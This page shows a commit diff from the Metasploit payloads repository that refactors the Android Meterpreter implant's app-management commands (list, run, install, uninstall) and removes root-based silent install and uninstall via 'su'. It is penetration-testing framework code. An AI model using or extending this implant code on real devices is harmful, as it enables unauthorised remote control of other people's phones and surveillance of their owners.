github/metasploit-payloads
1
Fork 0
mirror of https://github.com/rapid7/metasploit-payloads synced 2025-01-20 20:37:27 +01:00
Code Releases Activity

cleanup appapi commands

Browse Source
This commit is contained in:
Tim W 2019-04-08 17:56:17 +08:00
parent fd26cf5bed
commit c41340fb07
5 changed files with 36 additions and 276 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

2
java/androidpayload/library/src/com/metasploit/meterpreter/AndroidMeterpreter.java
View File

@ -137,12 +137,10 @@ public class AndroidMeterpreter extends Meterpreter {
mgr.registerCommand("stdapi_sys_process_get_processes", stdapi_sys_process_get_processes_android.class);
mgr.registerCommand("stdapi_ui_desktop_screenshot", stdapi_ui_desktop_screenshot.class);
if (context != null) {
// Application
mgr.registerCommand("appapi_app_list", appapi_app_list.class);
mgr.registerCommand("appapi_app_run", appapi_app_run.class);
mgr.registerCommand("appapi_app_install", appapi_app_install.class);
mgr.registerCommand("appapi_app_uninstall", appapi_app_uninstall.class);
// Application
mgr.registerCommand("webcam_audio_record", webcam_audio_record_android.class);
mgr.registerCommand("webcam_list", webcam_list_android.class);
mgr.registerCommand("webcam_start", webcam_start_android.class);

92
java/androidpayload/library/src/com/metasploit/meterpreter/android/appapi_app_install.java
View File

@ -1,27 +1,20 @@
package com.metasploit.meterpreter.android;
import android.content.Context;
import android.os.PowerManager;
import android.app.Activity;
import android.content.Intent;
import android.net.Uri;
import android.os.Bundle;
import java.io.DataInputStream;
import java.io.DataOutputStream;
import java.util.List;
import java.io.File;
import com.metasploit.meterpreter.AndroidMeterpreter;
import com.metasploit.meterpreter.Meterpreter;
import com.metasploit.meterpreter.TLVPacket;
import com.metasploit.meterpreter.TLVType;
import com.metasploit.meterpreter.command.Command;
public class appapi_app_install implements Command {
private static final int TLV_EXTENSIONS = 20000;
private static final int TLV_TYPE_APP_USEROOT = TLVPacket.TLV_META_TYPE_BOOL | (TLV_EXTENSIONS + 2910);
private static final int TLV_TYPE_APP_APK_PATH = TLVPacket.TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 2914);
private static final int TLV_TYPE_APP_ENUM = TLVPacket.TLV_META_TYPE_UINT | (TLV_EXTENSIONS + 2915);
final Context context = AndroidMeterpreter.getContext();
@ -30,7 +23,6 @@ public class appapi_app_install implements Command {
public int execute(Meterpreter meterpreter, TLVPacket request, TLVPacket response) throws Exception {
String apkpath = request.getStringValue(TLV_TYPE_APP_APK_PATH);
// Check File Exists
File file = new File(apkpath);
if(!file.exists())
{
@ -38,84 +30,12 @@ public class appapi_app_install implements Command {
return ERROR_SUCCESS;
}
// Use Root .?
if (request.getBooleanValue(TLV_TYPE_APP_USEROOT))
{
if (canRunRootCommands())
{
Runtime.getRuntime().exec("chmod 777 " + apkpath);
Runtime.getRuntime().exec(new String[] {"su", "-c", "pm install -r -d " + apkpath});
response.addOverflow(TLV_TYPE_APP_ENUM, 1); // Good
}
else
{
response.addOverflow(TLV_TYPE_APP_ENUM, 3); // Root access rejected
}
}
else
{
Intent intent = new Intent(Intent.ACTION_VIEW);
intent.setDataAndType(Uri.fromFile(new File(apkpath)), "application/vnd.android.package-archive");
intent.setFlags(Intent.FLAG_ACTIVITY_NEW_TASK);
context.startActivity(intent);
response.addOverflow(TLV_TYPE_APP_ENUM, 1); // Good
}
Intent intent = new Intent(Intent.ACTION_VIEW);
intent.setDataAndType(Uri.fromFile(new File(apkpath)), "application/vnd.android.package-archive");
intent.setFlags(Intent.FLAG_ACTIVITY_NEW_TASK);
context.startActivity(intent);
response.addOverflow(TLV_TYPE_APP_ENUM, 1); // Good
return ERROR_SUCCESS;
}
private boolean canRunRootCommands() {
boolean retval;
Process suProcess;
try
{
suProcess = Runtime.getRuntime().exec("su");
DataOutputStream os = new DataOutputStream(suProcess.getOutputStream());
DataInputStream osRes = new DataInputStream(suProcess.getInputStream());
// Getting the id of the current user to check if this is root
os.writeBytes("id\n");
os.flush();
String currUid = osRes.readLine();
boolean exitSu;
if (currUid == null)
{
retval = false;
exitSu = false;
//Log.d("ROOT", "Can't get root access or denied by user");
}
else if (currUid.contains("uid=0"))
{
retval = true;
exitSu = true;
//Log.d("ROOT", "Root access granted");
}
else
{
retval = false;
exitSu = true;
//Log.d("ROOT", "Root access rejected: " + currUid);
}
if (exitSu)
{
os.writeBytes("exit\n");
os.flush();
}
}
catch (Exception e)
{
// Can't get root !
// Probably broken pipe exception on trying to write to output stream (os) after su failed, meaning that the device is not rooted
retval = false;
//Log.d("ROOT", "Root access rejected [" + e.getClass().getName() + "] : " + e.getMessage());
}
return retval;
}
}

103
java/androidpayload/library/src/com/metasploit/meterpreter/android/appapi_app_list.java
View File

@ -1,27 +1,20 @@
package com.metasploit.meterpreter.android;
import android.content.Context;
import android.os.PowerManager;
import android.app.Activity;
import android.app.ActivityManager;
import android.content.Context;
import android.content.pm.ApplicationInfo;
import android.content.pm.PackageInfo;
import android.content.pm.PackageManager;
import android.os.Bundle;
import android.util.Log;
import android.widget.Toast;
import java.util.List;
import com.metasploit.meterpreter.AndroidMeterpreter;
import com.metasploit.meterpreter.Meterpreter;
import com.metasploit.meterpreter.TLVPacket;
import com.metasploit.meterpreter.TLVType;
import com.metasploit.meterpreter.command.Command;
public class appapi_app_list implements Command {
private static final int TLV_EXTENSIONS = 20000;
private static final int TLV_TYPE_APPS_LIST = TLVPacket.TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 2911);
private static final int TLV_TYPE_APPS_LIST_OPT = TLVPacket.TLV_META_TYPE_UINT | (TLV_EXTENSIONS + 2912);
@ -30,74 +23,27 @@ public class appapi_app_list implements Command {
@Override
public int execute(Meterpreter meterpreter, TLVPacket request, TLVPacket response) throws Exception {
int opt = request.getIntValue(TLV_TYPE_APPS_LIST_OPT);
final PackageManager pm = context.getPackageManager();
PackageManager pm = context.getPackageManager();
List<ApplicationInfo> packages = pm.getInstalledApplications(PackageManager.GET_META_DATA);
switch (opt)
{
case 0:
// Get All Apps
for (ApplicationInfo packageInfo : packages) {
response.addOverflow(TLV_TYPE_APPS_LIST, pm.getApplicationLabel(packageInfo)); // App Name
response.addOverflow(TLV_TYPE_APPS_LIST, packageInfo.packageName); // PackageName
response.addOverflow(TLV_TYPE_APPS_LIST, Boolean.toString(isAppRunning(context, packageInfo.packageName))); // Running?
response.addOverflow(TLV_TYPE_APPS_LIST, Boolean.toString(isSystem(context, packageInfo.packageName))); // System?
}
break;
case 1:
// Get User apps ONLY
for (ApplicationInfo packageInfo : packages) {
if (!isSystem(context, packageInfo.packageName)) {
response.addOverflow(TLV_TYPE_APPS_LIST, pm.getApplicationLabel(packageInfo)); // App Name
response.addOverflow(TLV_TYPE_APPS_LIST, packageInfo.packageName); // PackageName
response.addOverflow(TLV_TYPE_APPS_LIST, Boolean.toString(isAppRunning(context, packageInfo.packageName))); // Running?
response.addOverflow(TLV_TYPE_APPS_LIST, Boolean.toString(false)); // System?
}
}
break;
case 2:
// Get System apps ONLY"
for (ApplicationInfo packageInfo : packages) {
if (isSystem(context, packageInfo.packageName)) {
response.addOverflow(TLV_TYPE_APPS_LIST, pm.getApplicationLabel(packageInfo)); // App Name
response.addOverflow(TLV_TYPE_APPS_LIST, packageInfo.packageName); // PackageName
response.addOverflow(TLV_TYPE_APPS_LIST, Boolean.toString(isAppRunning(context, packageInfo.packageName))); // Running?
response.addOverflow(TLV_TYPE_APPS_LIST, Boolean.toString(true)); // System?
}
}
break;
ActivityManager activityManager = (ActivityManager) context.getSystemService(Context.ACTIVITY_SERVICE);
List<ActivityManager.RunningAppProcessInfo> procInfos = activityManager.getRunningAppProcesses();
for (ApplicationInfo packageInfo : packages) {
boolean system = (packageInfo.flags & ApplicationInfo.FLAG_SYSTEM) != 0;
if ((opt == 1 && system || opt == 2 && !system)) {
continue;
}
String label = pm.getApplicationLabel(packageInfo).toString();
String packageName = packageInfo.packageName;
boolean running = isAppRunning(procInfos, packageName);
response.addOverflow(TLV_TYPE_APPS_LIST, label); // App Name
response.addOverflow(TLV_TYPE_APPS_LIST, packageName); // PackageName
response.addOverflow(TLV_TYPE_APPS_LIST, Boolean.toString(running)); // Running?
response.addOverflow(TLV_TYPE_APPS_LIST, Boolean.toString(system)); // System?
}
// return ERROR_FAILURE;
return ERROR_SUCCESS;
}
private boolean AppRun(final Context context, final String packageName) {
return isActivtyRunning(context, packageName) && isAppRunning(context, packageName);
}
private boolean isActivtyRunning(final Context context, final String packageName) {
final ActivityManager activityManager = (ActivityManager) context.getSystemService(Context.ACTIVITY_SERVICE);
final List<ActivityManager.RunningTaskInfo> procInfos = activityManager.getRunningTasks(Integer.MAX_VALUE);
if (procInfos != null)
{
for (ActivityManager.RunningTaskInfo task : procInfos) {
if (context.getPackageName().equalsIgnoreCase(task.baseActivity.getPackageName()))
return true;
}
}
return false;
}
private boolean isAppRunning(final Context context, final String packageName) {
final ActivityManager activityManager = (ActivityManager) context.getSystemService(Context.ACTIVITY_SERVICE);
final List<ActivityManager.RunningAppProcessInfo> procInfos = activityManager.getRunningAppProcesses();
private boolean isAppRunning(List<ActivityManager.RunningAppProcessInfo> procInfos, final String packageName) {
if (procInfos != null)
{
for (final ActivityManager.RunningAppProcessInfo processInfo : procInfos) {
@ -109,19 +55,4 @@ public class appapi_app_list implements Command {
return false;
}
private boolean isSystem(final Context context, final String packageName) {
PackageManager pm = context.getPackageManager();
ApplicationInfo ai;
try {
ai = pm.getApplicationInfo(packageName, 0);
if ((ai.flags & ApplicationInfo.FLAG_SYSTEM) != 0) {
return true;
}
} catch (PackageManager.NameNotFoundException e) {
e.printStackTrace();
}
return false;
}
}

9
java/androidpayload/library/src/com/metasploit/meterpreter/android/appapi_app_run.java
View File

@ -1,23 +1,16 @@
package com.metasploit.meterpreter.android;
import android.content.Context;
import android.os.PowerManager;
import android.app.Activity;
import android.content.Context;
import android.content.Intent;
import android.os.Bundle;
import java.util.List;
import java.io.File;
import com.metasploit.meterpreter.AndroidMeterpreter;
import com.metasploit.meterpreter.Meterpreter;
import com.metasploit.meterpreter.TLVPacket;
import com.metasploit.meterpreter.TLVType;
import com.metasploit.meterpreter.command.Command;
public class appapi_app_run implements Command {
private static final int TLV_EXTENSIONS = 20000;
private static final int TLV_TYPE_APP_PACKAGE_NAME = TLVPacket.TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 2913);
private static final int TLV_TYPE_APP_RUN_ENUM = TLVPacket.TLV_META_TYPE_UINT | (TLV_EXTENSIONS + 2916);

106
java/androidpayload/library/src/com/metasploit/meterpreter/android/appapi_app_uninstall.java
View File

@ -1,27 +1,19 @@
package com.metasploit.meterpreter.android;
import android.content.Context;
import android.content.pm.PackageManager;
import android.os.PowerManager;
import android.app.Activity;
import android.content.Intent;
import android.content.pm.PackageManager;
import android.net.Uri;
import android.os.Bundle;
import java.io.DataInputStream;
import java.io.DataOutputStream;
import java.util.List;
import com.metasploit.meterpreter.AndroidMeterpreter;
import com.metasploit.meterpreter.Meterpreter;
import com.metasploit.meterpreter.TLVPacket;
import com.metasploit.meterpreter.TLVType;
import com.metasploit.meterpreter.command.Command;
public class appapi_app_uninstall implements Command {
private static final int TLV_EXTENSIONS = 20000;
private static final int TLV_TYPE_APP_USEROOT = TLVPacket.TLV_META_TYPE_BOOL | (TLV_EXTENSIONS + 2910);
private static final int TLV_TYPE_APP_PACKAGE_NAME = TLVPacket.TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 2913);
private static final int TLV_TYPE_APP_ENUM = TLVPacket.TLV_META_TYPE_UINT | (TLV_EXTENSIONS + 2915);
@ -29,108 +21,34 @@ public class appapi_app_uninstall implements Command {
@Override
public int execute(Meterpreter meterpreter, TLVPacket request, TLVPacket response) throws Exception {
// AndroidMeterpreter androidMeterpreter = (AndroidMeterpreter) meterpreter;
// final Context context = androidMeterpreter.getContext();
String PackageName = request.getStringValue(TLV_TYPE_APP_PACKAGE_NAME);
String packageName = request.getStringValue(TLV_TYPE_APP_PACKAGE_NAME);
if (!isPackageInstalled(PackageName))
if (!isPackageInstalled(packageName))
{
response.addOverflow(TLV_TYPE_APP_ENUM, 11); // Package not found
return ERROR_SUCCESS;
}
// Use Root .?
if (request.getBooleanValue(TLV_TYPE_APP_USEROOT))
{
if (canRunRootCommands())
{
Runtime.getRuntime().exec(new String[] {"su", "-c", "pm uninstall " + PackageName});
response.addOverflow(TLV_TYPE_APP_ENUM, 1); // Good
}
else
{
response.addOverflow(TLV_TYPE_APP_ENUM, 3); // Root access rejected
}
}
else
{
Intent intent = new Intent(Intent.ACTION_DELETE);
intent.setData(Uri.parse("package:" + PackageName));
intent.setFlags(Intent.FLAG_ACTIVITY_NEW_TASK);
context.startActivity(intent);
response.addOverflow(TLV_TYPE_APP_ENUM, 1); // Good
}
String PackageName = request.getStringValue(TLV_TYPE_APP_PACKAGE_NAME);
Intent intent = new Intent(Intent.ACTION_DELETE);
intent.setData(Uri.parse("package:" + PackageName));
intent.setFlags(Intent.FLAG_ACTIVITY_NEW_TASK);
context.startActivity(intent);
response.addOverflow(TLV_TYPE_APP_ENUM, 1); // Good
return ERROR_SUCCESS;
}
private boolean isPackageInstalled(String packageName) {
boolean found = true;
try
{
context.getPackageManager().getPackageInfo(packageName, 0);
}
catch (PackageManager.NameNotFoundException e)
{
found = false;
return false;
}
return found;
}
private boolean canRunRootCommands() {
boolean retval;
Process suProcess;
try
{
suProcess = Runtime.getRuntime().exec("su");
DataOutputStream os = new DataOutputStream(suProcess.getOutputStream());
DataInputStream osRes = new DataInputStream(suProcess.getInputStream());
// Getting the id of the current user to check if this is root
os.writeBytes("id\n");
os.flush();
String currUid = osRes.readLine();
boolean exitSu;
if (currUid == null)
{
retval = false;
exitSu = false;
//Log.d("ROOT", "Can't get root access or denied by user");
}
else if (currUid.contains("uid=0"))
{
retval = true;
exitSu = true;
//Log.d("ROOT", "Root access granted");
}
else
{
retval = false;
exitSu = true;
//Log.d("ROOT", "Root access rejected: " + currUid);
}
if (exitSu)
{
os.writeBytes("exit\n");
os.flush();
}
}
catch (Exception e)
{
// Can't get root !
// Probably broken pipe exception on trying to write to output stream (os) after su failed, meaning that the device is not rooted
retval = false;
//Log.d("ROOT", "Root access rejected [" + e.getClass().getName() + "] : " + e.getMessage());
}
return retval;
return true;
}
}